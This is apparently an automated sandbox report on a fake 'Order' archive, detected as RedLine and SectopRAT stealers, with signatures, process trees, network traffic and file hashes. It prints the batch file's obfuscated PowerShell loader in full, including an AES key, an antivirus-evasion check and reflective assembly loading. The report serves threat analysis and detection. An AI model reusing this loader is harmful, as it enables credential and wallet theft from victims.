Analysis Overview
SHA256
1e25a7bc0db9281c42da2da851051566e291a19839ae4203b8b8c0f70979d1ea
Threat Level: Known bad
The file Order Nº TM24-10-08.tar was found to be: Known bad.
Malicious Activity Summary
SectopRAT
SectopRAT payload
RedLine
RedLine payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Accesses cryptocurrency files/wallets, possible credential harvesting
System Location Discovery: System Language Discovery
Modifies Internet Explorer settings
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-08 10:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-08 10:33
Reported
2024-10-08 10:36
Platform
win7-20240903-en
Max time kernel
104s
Max time network
19s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1848 wrote to memory of 2952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1848 wrote to memory of 2952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1848 wrote to memory of 2952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1848 wrote to memory of 3052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 3052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 3052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1848 wrote to memory of 3052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.bat';$DXzR='ReamnDpdLmnDpinmnDpesmnDp'.Replace('mnDp', ''),'EntbEvvrybEvvPbEvvoinbEvvtbEvv'.Replace('bEvv', ''),'FromvYVmmvYVBmvYVamvYVsmvYVe6mvYV4SmvYVtrmvYVingmvYV'.Replace('mvYV', ''),'SpeSWZliteSWZ'.Replace('eSWZ', ''),'DePsMkcoPsMkmpPsMkrPsMkesPsMksPsMk'.Replace('PsMk', ''),'ChrhhOarhhOnrhhOgrhhOeExrhhOtenrhhOsirhhOorhhOnrhhO'.Replace('rhhO', ''),'GetALBtCtALButALBrrtALBentALBtPtALBrotALBctALBestALBstALB'.Replace('tALB', ''),'InIMkLvoIMkLkeIMkL'.Replace('IMkL', ''),'LoIpdGaIpdGdIpdG'.Replace('IpdG', ''),'CopOzUZyToOzUZ'.Replace('OzUZ', ''),'EleThfYmenThfYtThfYAThfYtThfY'.Replace('ThfY', ''),'MaOxpNinMOxpNoOxpNdOxpNuOxpNleOxpN'.Replace('OxpN', ''),'CIQANreaIQANteDIQANeIQANcrIQANyIQANptoIQANrIQAN'.Replace('IQAN', ''),'TofCFraofCFnofCFsfoofCFrmofCFFiofCFnaofCFlofCFBofCFlocofCFkofCF'.Replace('ofCF', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($DXzR[6])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function bDdfx($DCabq){$PkWMx=[System.Security.Cryptography.Aes]::Create();$PkWMx.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PkWMx.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PkWMx.Key=[System.Convert]::($DXzR[2])('2mOYEaPt8lWctq01VMMqhN34VnXfkC7nLbHLQY7/Qz8=');$PkWMx.IV=[System.Convert]::($DXzR[2])('dCF02IjSKAA6m1jMUv5SoQ==');$AcKBd=$PkWMx.($DXzR[12])();$MScdO=$AcKBd.($DXzR[13])($DCabq,0,$DCabq.Length);$AcKBd.Dispose();$PkWMx.Dispose();$MScdO;}function DOVto($DCabq){$BTfcL=New-Object System.IO.MemoryStream(,$DCabq);$KMREB=New-Object System.IO.MemoryStream;$ushEi=New-Object System.IO.Compression.GZipStream($BTfcL,[IO.Compression.CompressionMode]::($DXzR[4]));$ushEi.($DXzR[9])($KMREB);$ushEi.Dispose();$BTfcL.Dispose();$KMREB.Dispose();$KMREB.ToArray();}$McwgB=[System.IO.File]::($DXzR[0])([Console]::Title);$cTfVJ=DOVto (bDdfx ([Convert]::($DXzR[2])([System.Linq.Enumerable]::($DXzR[10])($McwgB, 
5).Substring(2))));$nYDNp=DOVto (bDdfx ([Convert]::($DXzR[2])([System.Linq.Enumerable]::($DXzR[10])($McwgB, 6).Substring(2))));[System.Reflection.Assembly]::($DXzR[8])([byte[]]$nYDNp).($DXzR[1]).($DXzR[7])($null,$null);[System.Reflection.Assembly]::($DXzR[8])([byte[]]$cTfVJ).($DXzR[1]).($DXzR[7])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-08 10:33
Reported
2024-10-08 10:37
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
94s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.bat';$DXzR='ReamnDpdLmnDpinmnDpesmnDp'.Replace('mnDp', ''),'EntbEvvrybEvvPbEvvoinbEvvtbEvv'.Replace('bEvv', ''),'FromvYVmmvYVBmvYVamvYVsmvYVe6mvYV4SmvYVtrmvYVingmvYV'.Replace('mvYV', ''),'SpeSWZliteSWZ'.Replace('eSWZ', ''),'DePsMkcoPsMkmpPsMkrPsMkesPsMksPsMk'.Replace('PsMk', ''),'ChrhhOarhhOnrhhOgrhhOeExrhhOtenrhhOsirhhOorhhOnrhhO'.Replace('rhhO', ''),'GetALBtCtALButALBrrtALBentALBtPtALBrotALBctALBestALBstALB'.Replace('tALB', ''),'InIMkLvoIMkLkeIMkL'.Replace('IMkL', ''),'LoIpdGaIpdGdIpdG'.Replace('IpdG', ''),'CopOzUZyToOzUZ'.Replace('OzUZ', ''),'EleThfYmenThfYtThfYAThfYtThfY'.Replace('ThfY', ''),'MaOxpNinMOxpNoOxpNdOxpNuOxpNleOxpN'.Replace('OxpN', ''),'CIQANreaIQANteDIQANeIQANcrIQANyIQANptoIQANrIQAN'.Replace('IQAN', ''),'TofCFraofCFnofCFsfoofCFrmofCFFiofCFnaofCFlofCFBofCFlocofCFkofCF'.Replace('ofCF', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($DXzR[6])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function bDdfx($DCabq){$PkWMx=[System.Security.Cryptography.Aes]::Create();$PkWMx.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PkWMx.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PkWMx.Key=[System.Convert]::($DXzR[2])('2mOYEaPt8lWctq01VMMqhN34VnXfkC7nLbHLQY7/Qz8=');$PkWMx.IV=[System.Convert]::($DXzR[2])('dCF02IjSKAA6m1jMUv5SoQ==');$AcKBd=$PkWMx.($DXzR[12])();$MScdO=$AcKBd.($DXzR[13])($DCabq,0,$DCabq.Length);$AcKBd.Dispose();$PkWMx.Dispose();$MScdO;}function DOVto($DCabq){$BTfcL=New-Object System.IO.MemoryStream(,$DCabq);$KMREB=New-Object System.IO.MemoryStream;$ushEi=New-Object System.IO.Compression.GZipStream($BTfcL,[IO.Compression.CompressionMode]::($DXzR[4]));$ushEi.($DXzR[9])($KMREB);$ushEi.Dispose();$BTfcL.Dispose();$KMREB.Dispose();$KMREB.ToArray();}$McwgB=[System.IO.File]::($DXzR[0])([Console]::Title);$cTfVJ=DOVto (bDdfx ([Convert]::($DXzR[2])([System.Linq.Enumerable]::($DXzR[10])($McwgB, 
5).Substring(2))));$nYDNp=DOVto (bDdfx ([Convert]::($DXzR[2])([System.Linq.Enumerable]::($DXzR[10])($McwgB, 6).Substring(2))));[System.Reflection.Assembly]::($DXzR[8])([byte[]]$nYDNp).($DXzR[1]).($DXzR[7])($null,$null);[System.Reflection.Assembly]::($DXzR[8])([byte[]]$cTfVJ).($DXzR[1]).($DXzR[7])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 51.195.145.71:26398 | 51.195.145.71 | tcp |
| US | 8.8.8.8:53 | 71.145.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.12.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 31.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ydznscy.pyh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\tmp3CD.tmp
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Temp\tmp3E2.tmp
| MD5 | eb8c6139f83c330881b13ec4460d5a39 |
| SHA1 | 837283823a7e4e107ca7e39b1e7c3801841b1ef8 |
| SHA256 | 489d5195735786050c4115677c5856e3ce72c3ecf2574be55021ad3d71caf40e |
| SHA512 | 88411dca362f0d9da0c093e60bf2b083340d0682b5ac91f25c78ac419cec1e325d0a5a0f96fd447d3d3806813cad7f1ca8cf9c423061327fbd16c8662f3cbddf |
C:\Users\Admin\AppData\Local\Temp\tmp40E.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\tmp423.tmp
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\tmp439.tmp
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmp464.tmp
| MD5 | 40f3eb83cc9d4cdb0ad82bd5ff2fb824 |
| SHA1 | d6582ba879235049134fa9a351ca8f0f785d8835 |
| SHA256 | cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0 |
| SHA512 | cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 25810771f9d970392716c34ce6220e28 |
| SHA1 | a46a92888ab77738de53813cd21a9283a0f0af6e |
| SHA256 | f4320541a7814040ef5871ebb098b48b227d3cace57188ee020e9ca5f184b6e0 |
| SHA512 | 7d1037ce5ec668646bc86d08aee3c5db6419d054f5f60f794f8764991cd0506d72d15d2d22e0f8d4adde8a7921d192aafcec4f3824a409de4a1e57ba5a7a6e33 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 928d36ad618a369ffebf44885d07cf81 |
| SHA1 | edf5a353a919c1873af8e6a0dfafa4c38c626975 |
| SHA256 | d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea |
| SHA512 | 4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a |
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-08 10:33
Reported
2024-10-08 10:37
Platform
win7-20240729-en
Max time kernel
94s
Max time network
17s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Processes
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.pdf"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | bdf4b196b56bd4f34dd9bfb2efffd6ec |
| SHA1 | 88b75f77b177ce223e462e667dbbca6b91e8f15b |
| SHA256 | 9c66ac492238d43306ac796e1248b6734c61f8b41d5f6ed824a07827bf9dde12 |
| SHA512 | a2eef91930f994a9136a4d6746061e68333e5cb2eff7b69b0ba3471df4ddf8d11ca0c6c37193ce93279501c16ef24f3de4ab7d588984bb0796fcfaed02927e2a |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-08 10:33
Reported
2024-10-08 10:36
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
126s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Order Nº TM24-10-08.pdf"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9F45627ADEFD7818AA9AC79350B22577 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A1B32E6BFF3D6BD688D3C53C33B8F5D7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A1B32E6BFF3D6BD688D3C53C33B8F5D7 --renderer-client-id=2 
--mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=61A9138E4E86BAF34FFA3427729A9FD5 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AA4ED39242504687DB94B5C37CF6053B --mojo-platform-channel-handle=1860 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
